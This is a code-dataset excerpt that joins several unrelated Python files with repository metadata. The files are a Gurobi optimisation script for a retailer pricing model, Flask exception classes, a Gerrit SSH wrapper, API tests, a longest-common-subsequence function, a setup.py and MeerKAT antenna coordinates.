== quicksum(inputBlock[client,bg,hour,sc]*gammaPriceR[client,bg] for bg in i))
auxiliar.update()
def solutionAuxiliar():
if auxiliar.status == GRB.Status.OPTIMAL:
print('-|--|--|--|--|--|--|--|--|--|')
#price settled by the retailer
gammaPriceRx = auxiliar.getAttr('x', gammaPriceR)
print('\nVariables de decision:')
#Print the variable result for the price settled
print("\nPrecio establecido por el intermediador")
print("Se tiene un solo precio por bloque de la curva de demanda")
for client in l:
print "Cliente " + str(client) + str(quicksum(gammaPriceRx[client,bg] for bg in i))
#revenue obtained by the retailer
INRX = auxiliar.getAttr('x',INR)
print('\nGanancia obtenida por el intermediador')
print('Esto se obtiene por escenario definido')
for sc in omega:
print "Escenario "+ str(sc) + str( quicksum(INRX[client,hour,sc] for client in l for hour in t))
#input purchased from the contract
inputTotalFx = auxiliar.getAttr('x', inputTotalF)
print('\nCantidad de pesticidas (ton) comprados al mayorista')
print('Esto se obtiene por contrato')
for frw in f:
print "Contrato " + str(frw) + "--> " + str(inputTotalFx[frw]) #IMPORTANT OUTPUT
inputBlockFx = auxiliar.getAttr('x',inputBlockF)
print('\nPrecio al que compra el intermediador por bloque')
print('Se obtiene por contrato')
for frw in f:
print 'Contrato ' + str(frw) + '-->' + str( quicksum(inputBlockFx[frw,pb] for pb in j) )
print('\nPrecio al que vende el intermediador por tipo de cliente')
print('Se obtiene por tipo de cliente (creo)')
inputPFx = auxiliar.getAttr('x',inputP)
for sc in omega:
for hour in t:
print 'Escenario -> ' + str(sc) +'->'+ str(inputPFx[hour,sc])
##################################################################################
#Constrains for the master problem
#9. change bg as string to int for iterate
def constraint9():
ctr9 = {}
for client in l:
ctr9[client] = master.addConstr(quicksum(A[client,bg] for bg in i) == 1 )
master.update()
# # #14. conditional expression for calculate risk if there is unfulfilled profit
M = 1000000
def constraint14a():
for scenario in omega:
master.addConstr(0 <= riskScenario[scenario] - (targetedProfit ) <= M * (1-k[scenario]))
master.update()
def constraint14b():
for scenario in omega:
master.addConstr(0 <= riskScenario[scenario] <= (M*k[scenario]))
master.update()
def optimizeMaster():
# master objective function
# 12a. auxiliar variable for the profit for scenario
for scenario in omega:
foMaster[scenario] = quicksum(inputBlock[client,bg,hour,sc]*A[client,bg] for client in l for bg in i for hour in t for sc in omega)
# - inputBlockF[frw,pwb]*priceBlock[frw,pwb]
# - inputP[hour,sc]*PricePool[hour,sc] for frw in f for pwb in j for hour in t for hour in t for client in l for bg in i for sc in omega)
quicksum(scenarioProb[sc] * quicksum(
(quicksum(inputBlock[client,bg,hour,sc]*gammaPriceR[client,bg] for client in l for bg in i)
- quicksum(inputP[hour,sc]*PricePool[hour,sc] for hour in t for sc in omega)
- quicksum(inputBlockF[frw,pwb]*priceBlock[frw,pwb] for frw in f for pwb in j))
for hour in t)
for sc in omega)
objFuncMaster = LinExpr()
# # #12. The expected profit of retailer which is equal to the expected revenue obtained from selling inputs to the end-users and to the pool minus the expected cost of purchasing inputs from the pool and through forward contracts as follows:
objFuncMaster += quicksum(scenarioProb[sc] * foMaster[sc] for sc in omega)
constraint9()
constraint14a()
constraint14b()
master.update()
master.setObjective(objFuncMaster,GRB.MAXIMIZE)
master.Params.Presolve = 0
master.optimize()
def solutionMaster():
if master.status == GRB.Status.OPTIMAL:
print('-|--|--|--|--|--|--|--|--|')
#price settled by the retailer
print('\nVariables de decision:')
#Print the variable result for the price settled
Ax = master.getAttr('x', A)
print("\nBloque ofrecido por el intermediador")
print("Se tiene un solo precio por bloque de la curva de demanda por cliente")
for client in l:
for bg in i:
print "Cliente " + str(client) + " " + "Curva (Binaria) " + str(bg) + ' -> ' +str(Ax[client,bg])
Aconstant[client,bg] = Ax[client,bg]
#risk by scenario
riskScenariox = master.getAttr('x',riskScenario)
print('\nNivel de riesgo por escenario')
for sc in omega:
print "Escenario "+ str(sc) + " ---> " + str(riskScenariox[sc])
def solveMaster():
optimizeMaster()
solutionMaster()
def solveAuxiliar():
constraint2(priceBlock)
constraint3(upperPriceForward)
constraint4()
constraint5(PricePool)
#constraint6(optimizeMaster,inputBlock)
constraint7()
#constraint8(upperPriceBlock)
#constraint10(inputBlock)
constraint11(inputBlock)
#12a. auxiliar variable for the profit for scenario
quicksum(scenarioProb[sc] * quicksum(
(quicksum(inputBlock[client,bg,hour,sc]*gammaPriceR[client,bg] for client in l for bg in i)
- quicksum(inputP[hour,sc]*PricePool[hour,sc] for hour in t for sc in omega)
- quicksum(inputBlockF[frw,pwb]*priceBlock[frw,pwb] for frw in f for pwb in j))
for hour in t)
for sc in omega)
auxiliar.update()
#auxiliar Objective function
objFuncAux = LinExpr()
#12. The expected profit of retailer which is equal to the expected revenue obtained from selling inputs to the end-users and to the pool minus the expected cost of purchasing inputs from the pool and through forward contracts as follows:
objFuncAux += quicksum(
scenarioProb[sc] *
foAux[scenario] for scenario in omega for sc in omega)
auxiliar.update()
#Optimice the auxiliar problem
auxiliar.update()
auxiliar.setObjective(objFuncAux,GRB.MAXIMIZE)
auxiliar.Params.Presolve = 0
auxiliar.optimize()
#Calculate the EDR
for scenario in omega:
if foAux[scenario] <= targetedProfit:
dr[scenario] = targetedProfit - foAux[scenario]
else:
dr[scenario] = 0
EDRS[scenario] = scenarioProb[scenario] * dr[scenario]
EDRZ.append(EDRS[scenario])
return EDRZ
def addCuts(inputBlock,upperPriceBlock):
#The price-quota curve for each client group in each period and scenario can be formulated as follows:
#6. The demand provided by the retailer is equal to the level of input of the price-quota curve indicated by binary variables
ctr6 = {}
for hour in t:
for client in l:
for sc in omega:
ctr6[hour,client,sc] = auxiliar.addConstr(inputR[client,hour,sc] == quicksum(inputBlock[client,bg,hour,sc]*Aconstant[client,bg] for bg in i)) #need to changue the sumatory
auxiliar.update()
#8. change bg as string to int for iterate
ctr8A = {}
for client in l:
for bg in (bg1 for bg1 in i if bg1 > 1):
ctr8A[client,bg] = auxiliar.addConstr(gammaPriceR[client,bg]
>= upperPriceBlock[client,bg-1]*Aconstant[client,bg])
ctr8B = {}
for client in l:
for bg in i:
ctr8B[client,bg] = auxiliar.addConstr(gammaPriceR[client,bg] <= upperPriceBlock[client,bg]*Aconstant[client,bg])
auxiliar.update()
#10. The electric input balance of the retailer in each period and scenario is expressed as follows
ctr10 = {}
for hour in t:
for sc in omega:
ctr10[hour,sc] = auxiliar.addConstr(
quicksum(inputBlock[client,bg,hour,sc] for client in l for bg in i)*Aconstant[client,bg]
>= (quicksum(inputP[hour,sc]+inputBlockF[frw,pwb] for frw in f for pwb in j)))
auxiliar.update()
print("PRIMERO HPTAAAAAAAAAAAAA")
solveMaster()
# print('\nAUXILIAR HPTAAAAAAAAAAAAA')
# solveAuxiliar()
# print("SEGUNDO HPTAAAAAAAAAAAAA")
# addCuts(inputBlock,upperPriceBlock)
# print('---*-*--*-*--*-*--*-*--*-*-Cortes aadidos -*-*--*-*--*-*--*-*-')
# solveAuxiliar()
while it < 10:
print "Iteracion -------------------->> " + str(it)
print('\nProblema Maestro')
if master.status == GRB.Status.INFEASIBLE:
print "Problema Maestro infactible, debe parar"
v = master.getVars()
break
solveMaster()
solveAuxiliar()
if master.status == GRB.Status.OPTIMAL:
print('\nProblema Auxiliar')
solveAuxiliar()
solutionAuxiliar()
if auxiliar.status == GRB.Status.UNBOUNDED:
print('\nModelo auxiliar no acotado')
dualVariables = [c.Pi for c in auxiliar.getConstrs()]
print('\nAnadiendo corte por factiblidad')
master.addConstr(dualVariables <= 0) #quicksum(Fy[client,i] for client in l for bg in i)
v = master.getVars()
print(v[0].varName, v[0].x)
if auxiliar.status == GRB.Status.INFEASIBLE:
print('\nModelo auxiliar infactible')
dualVariables = [c.Pi for c in auxiliar.getConstrs()]
zlower = auxiliar.ObjVal
master.addConstr(zlower >= dualVariables)
v = master.getVars()
print(v[0].varName, v[0].x)
it += 1
#try:
# while auxiliar.ObjVal != 0:
# it += 1
# print "Iteracion -------------------->> " + str(it)
# print('\nProblema Maestro')
# optimizeMaster()
# solutionMaster()
# print('\nProblema Auxiliar')
# optimizeAuxiliar()
# solutionAuxiliar()
#except AttributeError:
# print "Iteracion ------------------------>> " + str(it)
# if auxiliar.status == GRB.Status.UNBOUNDED:
# dualVariables = [c.Pi for c in auxiliar.getConstrs()]
# h = 1
# Fy = {}
# Ax = master.getAttr('x', A)
# for client in l:
# for bg in i:
# Fy[client,bg] = Ax[client,bg]
# factCuts ={}
# print('\nAnadiendo corte por factibilidad...')
# master.addConstr(dualVariables <= 0) #quicksum(Fy[client,i] for client in l for bg in i)
# print('\nResolviendo problema maestro...')
# optimizeMaster()
# solutionMaster()
| 42.757813 | 244 | 0.665997 |
2bf24d4d24a4a6440441ad109f12ea1939a2643c | 1,419 | py | Python | rabbitai/annotation_layers/commands/exceptions.py | psbsgic/rabbitai | 769e120ba605d56ac076f810a549c38dac410c8e | [
"Apache-2.0"
] | null | null | null | rabbitai/annotation_layers/commands/exceptions.py | psbsgic/rabbitai | 769e120ba605d56ac076f810a549c38dac410c8e | [
"Apache-2.0"
] | null | null | null | rabbitai/annotation_layers/commands/exceptions.py | psbsgic/rabbitai | 769e120ba605d56ac076f810a549c38dac410c8e | [
"Apache-2.0"
] | 1 | 2021-07-09T16:29:50.000Z | 2021-07-09T16:29:50.000Z | from flask_babel import lazy_gettext as _
from rabbitai.commands.exceptions import (
CommandException,
CommandInvalidError,
CreateFailedError,
DeleteFailedError,
ValidationError,
)
class AnnotationLayerInvalidError(CommandInvalidError):
message = _("Annotation layer parameters are invalid.")
class AnnotationLayerBulkDeleteFailedError(DeleteFailedError):
message = _("Annotation layer could not be deleted.")
class AnnotationLayerCreateFailedError(CreateFailedError):
message = _("Annotation layer could not be created.")
class AnnotationLayerUpdateFailedError(CreateFailedError):
message = _("Annotation layer could not be updated.")
class AnnotationLayerNotFoundError(CommandException):
message = _("Annotation layer not found.")
class AnnotationLayerDeleteFailedError(CommandException):
message = _("Annotation layer delete failed.")
class AnnotationLayerDeleteIntegrityError(CommandException):
message = _("Annotation layer has associated annotations.")
class AnnotationLayerBulkDeleteIntegrityError(CommandException):
message = _("Annotation layer has associated annotations.")
class AnnotationLayerNameUniquenessValidationError(ValidationError):
"""
Marshmallow validation error for annotation layer name already exists
"""
def __init__(self) -> None:
super().__init__([_("Name must be unique")], field_name="name")
| 27.823529 | 73 | 0.776603 |
d60eca385da4b9e81cf7cb5c5a37ef9d8ccc91b5 | 832 | py | Python | os_gov/gerrit.py | pyKun/os-gov | 0100d853916bd47ee89b2bc9d9a914484b5fb062 | [
"Apache-2.0"
] | null | null | null | os_gov/gerrit.py | pyKun/os-gov | 0100d853916bd47ee89b2bc9d9a914484b5fb062 | [
"Apache-2.0"
] | null | null | null | os_gov/gerrit.py | pyKun/os-gov | 0100d853916bd47ee89b2bc9d9a914484b5fb062 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: Kun Huang <academicgareth@gmail.com>
from gerritlib import gerrit
from os_gov import utils
class Gerrit(gerrit.Gerrit):
def __init__(self, username=None):
self.host = "review.openstack.org"
# TODO mv get_gerrit_usename to shell.py later
self.user = username or utils.get_gerrit_usename()
super(Gerrit, self).__init__(hostname=self.host, username=self.user)
def listMembers(self, group, recursive=False):
if recursive:
cmd = "gerrit ls-members --recursive %s" % group
else:
cmd = "gerrit ls-members %s" % group
out, err = self._ssh(cmd)
if out.strip() == "Group not found or not visible":
return None
members = utils.parse_members(out)
return members
| 32 | 76 | 0.635817 |
f7d29c4a6104c291a57b5e0647183a6bf9f5b3c7 | 1,696 | py | Python | oriskami/test/resources/test_event_queue.py | oriskami/oriskami-python | 2b0d81f713a9149977907183c67eec136d49ee8c | [
"MIT"
] | 4 | 2017-05-28T19:37:31.000Z | 2017-06-13T11:34:26.000Z | oriskami/test/resources/test_event_queue.py | ubivar/ubivar-python | 2b0d81f713a9149977907183c67eec136d49ee8c | [
"MIT"
] | null | null | null | oriskami/test/resources/test_event_queue.py | ubivar/ubivar-python | 2b0d81f713a9149977907183c67eec136d49ee8c | [
"MIT"
] | null | null | null | import os
import oriskami
import warnings
from oriskami.test.helper import (OriskamiTestCase)
class OriskamiAPIResourcesTests(OriskamiTestCase):
def test_event_queue_retrieve(self):
response = oriskami.EventQueue.retrieve("1")
event = response.data[0]
self.assertEqual(event["id"], "1")
self.assertEqual(event.queues.active, "rules_base")
response = oriskami.EventQueue.retrieve("2")
event = response.data[0]
self.assertEqual(event["id"], "2")
self.assertEqual(event.queues.active, "peer_review")
response = oriskami.EventQueue.retrieve("3")
event = response.data[0]
self.assertEqual(event["id"], "3")
self.assertEqual(event.queues, None)
def test_event_queue_update(self):
eventId = "1"
response = oriskami.EventQueue.update(eventId, active="rules_custom")
self.assertEqual(response.data[0].id, eventId)
self.assertEqual(response.data[0].queues.active, "rules_custom")
response = oriskami.EventQueue.update(eventId, active="rules_base")
self.assertEqual(response.data[0].queues.active, "rules_base")
def test_event_queue_delete(self):
eventId = "1"
response = oriskami.EventQueue.delete(eventId)
self.assertFalse(hasattr(response.data[0].queues, "active"))
response = oriskami.EventQueue.update(eventId, active="rules_base")
self.assertTrue(hasattr(response.data[0].queues, "active"))
self.assertEqual(response.data[0].queues.active, "rules_base")
def test_event_queue_list(self):
response = oriskami.EventQueue.list()
self.assertTrue(len(response.data) == 2)
| 36.085106 | 77 | 0.679835 |
fdcf3311a01778c76a4352a35142d4bd206ca6d9 | 2,029 | py | Python | dynamic_programming/longest_common_subsequence.py | JB1959/Python | b6ca263983933c3ecc06ed0083dd11b6faf870c8 | [
"MIT"
] | 145,614 | 2016-07-21T05:40:05.000Z | 2022-03-31T22:17:22.000Z | dynamic_programming/longest_common_subsequence.py | Agha-Muqarib/Python | 04f156a8973d6156a4357e0717d9eb0aa264d086 | [
"MIT"
] | 3,987 | 2016-07-28T17:31:25.000Z | 2022-03-30T23:07:46.000Z | dynamic_programming/longest_common_subsequence.py | Agha-Muqarib/Python | 04f156a8973d6156a4357e0717d9eb0aa264d086 | [
"MIT"
] | 40,014 | 2016-07-26T15:14:41.000Z | 2022-03-31T22:23:03.000Z | """
LCS Problem Statement: Given two sequences, find the length of longest subsequence
present in both of them. A subsequence is a sequence that appears in the same relative
order, but not necessarily continuous.
Example:"abc", "abg" are subsequences of "abcdefgh".
"""
def longest_common_subsequence(x: str, y: str):
"""
Finds the longest common subsequence between two strings. Also returns the
The subsequence found
Parameters
----------
x: str, one of the strings
y: str, the other string
Returns
-------
L[m][n]: int, the length of the longest subsequence. Also equal to len(seq)
Seq: str, the subsequence found
>>> longest_common_subsequence("programming", "gaming")
(6, 'gaming')
>>> longest_common_subsequence("physics", "smartphone")
(2, 'ph')
>>> longest_common_subsequence("computer", "food")
(1, 'o')
"""
# find the length of strings
assert x is not None
assert y is not None
m = len(x)
n = len(y)
# declaring the array for storing the dp values
L = [[0] * (n + 1) for _ in range(m + 1)]
for i in range(1, m + 1):
for j in range(1, n + 1):
if x[i - 1] == y[j - 1]:
match = 1
else:
match = 0
L[i][j] = max(L[i - 1][j], L[i][j - 1], L[i - 1][j - 1] + match)
seq = ""
i, j = m, n
while i > 0 and j > 0:
if x[i - 1] == y[j - 1]:
match = 1
else:
match = 0
if L[i][j] == L[i - 1][j - 1] + match:
if match == 1:
seq = x[i - 1] + seq
i -= 1
j -= 1
elif L[i][j] == L[i - 1][j]:
i -= 1
else:
j -= 1
return L[m][n], seq
if __name__ == "__main__":
a = "AGGTAB"
b = "GXTXAYB"
expected_ln = 4
expected_subseq = "GTAB"
ln, subseq = longest_common_subsequence(a, b)
print("len =", ln, ", sub-sequence =", subseq)
import doctest
doctest.testmod()
| 24.154762 | 87 | 0.520946 |
6bfbf0edfa99d96da5c57ef8cc9a6323bf23960e | 1,333 | py | Python | setup.py | asaskevich/binario | 8d40337952ab77f02da0edeae7fa761eadf6ab45 | [
"MIT"
] | 3 | 2017-06-24T16:00:15.000Z | 2020-12-02T15:53:35.000Z | setup.py | asaskevich/binario | 8d40337952ab77f02da0edeae7fa761eadf6ab45 | [
"MIT"
] | null | null | null | setup.py | asaskevich/binario | 8d40337952ab77f02da0edeae7fa761eadf6ab45 | [
"MIT"
] | 3 | 2015-08-13T08:33:41.000Z | 2018-03-04T21:42:41.000Z | from setuptools import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='binario',
version='0.0.4',
description='Package that lets an application read/write primitive data ' +
'types from an underlying input/output stream as binary data.',
long_description=readme(),
url='http://github.com/asaskevich/binario',
keywords='io input output file binary binario data',
author='Alex Saskevich',
author_email='bwatas@gmail.com',
license='MIT',
packages=['binario'],
test_suite='nose.collector',
tests_require=['nose'],
download_url="https://pypi.python.org/pypi/binario",
classifiers=[
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System',
'Topic :: System :: Filesystems',
'Topic :: Utilities',
],
zip_safe=False) | 36.027027 | 81 | 0.588147 |
c1ac58198c5c7e0ba4ee91e480ca930e48aa3d11 | 4,340 | py | Python | data/T-RECS/MeerKAT.py | CosmoStat/ShapeDeconv | 3869cb6b9870ff1060498eedcb99e8f95908f01a | [
"MIT"
] | 4 | 2020-12-17T14:58:28.000Z | 2022-01-22T06:03:55.000Z | data/T-RECS/MeerKAT.py | CosmoStat/ShapeDeconv | 3869cb6b9870ff1060498eedcb99e8f95908f01a | [
"MIT"
] | 9 | 2021-01-13T10:38:28.000Z | 2021-07-06T23:37:08.000Z | data/T-RECS/MeerKAT.py | CosmoStat/ShapeDeconv | 3869cb6b9870ff1060498eedcb99e8f95908f01a | [
"MIT"
] | null | null | null | #! /usr/bin/python3
# -*- coding: utf-8 -*-
class MeerKATarray(object):
def __init__(self):
import numpy as np
from astropy.coordinates import EarthLocation
import astropy.units as u
self.Array=np.array([[ 5109271.49735416, 5109284.85407754, 5109272.1993435 ,
5109294.92858499, 5109291.9021494 , 5109233.71782573,
5109209.26348941, 5109148.3563611 , 5109180.03524117,
5109093.55655612, 5109170.18055871, 5109142.24732406,
5109095.43320709, 5109130.11047997, 5109186.74678517,
5109174.26788279, 5109240.95388574, 5109212.2308251 ,
5109170.17197292, 5109190.13422423, 5109319.27502221,
5109501.27803052, 5109415.83816637, 5109563.6943163 ,
5109409.88085549, 5109340.50686944, 5109343.51732174,
5109339.74820941, 5109357.50532698, 5109320.53511894,
5109280.81866453, 5109561.41124047, 5109223.0447991 ,
5109141.20538522, 5109088.62895199, 5109012.51005451,
5109021.19439314, 5109040.86390684, 5109158.68572906,
5109280.35702671, 5109533.61299471, 5109972.69938675,
5110157.09530499, 5110723.7009419 , 5109331.7459565 ,
5111655.26092217, 5110888.06656438, 5109713.65348687,
5109311.35148968, 5109039.4227322 , 5108748.65570024,
5108814.45202929, 5108974.66330238, 5109003.20020234,
5110793.52095214, 5109608.66590919, 5108382.61808825,
5107254.01347188, 5108278.55916154, 5108713.98241022,
5109748.52632071],
[ 2006808.89302781, 2006824.22172353, 2006783.54604995,
2006755.50985406, 2006692.96802726, 2006783.34519269,
2006697.07228302, 2006668.92154865, 2006816.61011285,
2006842.5269473 , 2006868.23609545, 2006917.43739644,
2007003.01945823, 2007063.78075524, 2007010.79288481,
2007089.17193214, 2007020.24474701, 2006908.08257804,
2006961.46137943, 2006890.0451634 , 2006518.56060045,
2006507.28233036, 2006528.18913299, 2006555.38709425,
2006765.75924307, 2006888.36185406, 2006791.07431684,
2006749.21628934, 2007035.57284496, 2007101.93689326,
2007317.01340668, 2007555.5082679 , 2007183.16215354,
2007181.46662131, 2007163.07668579, 2007124.61491175,
2006948.62994241, 2006698.32802902, 2006464.53114915,
2006432.6365746 , 2006244.02924612, 2006130.37573833,
2005196.44300058, 2005811.69710478, 2006220.13139806,
2004739.74954867, 2003578.58732047, 2004786.46861502,
2005919.93511349, 2006089.30840302, 2006622.47104818,
2007575.08416726, 2007992.33987636, 2008429.66935399,
2007732.1493962 , 2009964.63970196, 2010429.23248703,
2009699.35721797, 2006410.13690606, 2005051.01654913,
2003331.23203868],
[-3239130.73614072, -3239100.12646042, -3239145.33004168,
-3239126.26624966, -3239169.94641344, -3239206.81520042,
-3239299.36668257, -3239413.45218346, -3239272.32242145,
-3239393.92388052, -3239256.01206258, -3239270.0825518 ,
-3239292.08731167, -3239199.22441129, -3239141.50848633,
-3239112.93487932, -3239049.21915551, -3239164.38124624,
-3239198.49211401, -3239210.78638671, -3239233.61957711,
-3238950.54476697, -3239073.85646735, -3238821.56314329,
-3238936.95141411, -3238971.92750107, -3239026.97172989,
-3239058.76457829, -3238853.87633838, -3238871.33463575,
-3238800.99879004, -3238207.17422081, -3238977.04746739,
-3239108.90628107, -3239203.63040132, -3239349.23577353,
-3239443.49706673, -3239566.50339235, -3239522.08840298,
-3239348.22709537, -3239061.14460898, -3238431.52176684,
-3238718.84306904, -3237438.29057988, -3239396.7638735 ,
-3236633.10524755, -3238574.25451153, -3239676.24008691,
-3239613.47504072, -3239941.07331375, -3240077.32054145,
-3239384.66757419, -3238870.28669984, -3238550.47820352,
-3236139.97163011, -3236636.20942028, -3238301.70200615,
-3240542.58734053, -3240956.88531359, -3241111.82913216,
-3240538.85373571]])
self.Loc=EarthLocation(
lat=-30.83 * u.deg,
lon=21.33 * u.deg,
height=1195. * u.m
) | 55.641026 | 86 | 0.676728 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.